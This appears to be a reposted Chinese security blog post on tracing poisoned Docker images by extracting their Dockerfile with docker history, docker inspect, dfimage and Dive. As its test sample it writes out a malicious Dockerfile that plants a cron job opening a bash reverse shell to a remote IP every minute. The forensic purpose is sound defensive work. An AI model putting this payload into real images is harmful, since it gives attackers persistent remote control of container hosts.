Docker镜像解析获取Dockerfile文件
2023-11-17 00:7:24
Author: 白帽子(查看原文)
阅读量:5
收藏
当涉及到容器镜像的安全时,特别是在出现镜像投毒引发的安全事件时,追溯镜像的来源和解析Dockerfile文件是应急事件处理的关键步骤。在这篇博客中,我们将探讨如何从镜像解析获取Dockerfile文件,这对容器安全至关重要。
02、环境准备
利用Dockfile构建一个反弹shell的恶意镜像:
FROM ubuntu:20.04
RUN apt-get update &&\
apt-get install -y cron &&\
(echo '* * * * * bash -c "bash -i >& /dev/tcp/192.168.99.242/12345 0>&1"'; crontab -l )| crontab
ENTRYPOINT ["cron","-f","&&"]
CMD ["/bin/bash"]
03、镜像解析Dockerfile
3.1 镜像文件解析
在镜像的元数据信息中,到镜像构建所使用的 Dockerfile,可以成功解析 Docker 镜像并获取其 Dockerfile 内容,以了解镜像的构建过程和引入的软件包及配置。
docker save -o test.tar test:v1.0
tar -xvf test.tar
3.2 docker命令参数
使用docker history 命令查看指定镜像的创建历史,展示只能看到一部分,可以加上 --no-trunc,就可以看到全部信息。
docker history test:v1.0
docker history test:v1.0 --no-trunc
使用docker inspect命令来查看Docker镜像的详细信息,通过--format参数可自行定义输出信息,获取镜像的配置信息。
#查看镜像的配置信息
docker inspect --format='{{json .Config}}' test:v1.0
3.3 dfimage
dfimage是一款第三方工具,可用来从镜像中提取 Dockerfile
(1)生成快捷方式,使用dfimage可以输出很详细的 Dockerfile。
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 test:v1.0
3.4 Docker镜像分析神器 Dive
Dive是一款Docker镜像分析神器,分析和浏览 Docker 容器镜像内部,可以很详细的看到每一层文件的变化。
alias dive="docker run -ti --rm -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive"
dive test:v1.0
文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650247134&idx=1&sn=387d0d2419bd0d5a10e4caf96b61baf2&chksm=82ea5477b59ddd611a29db5bbde02ddc018a08424607a61d906d44ab36efbe0efaeb6463efaa&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh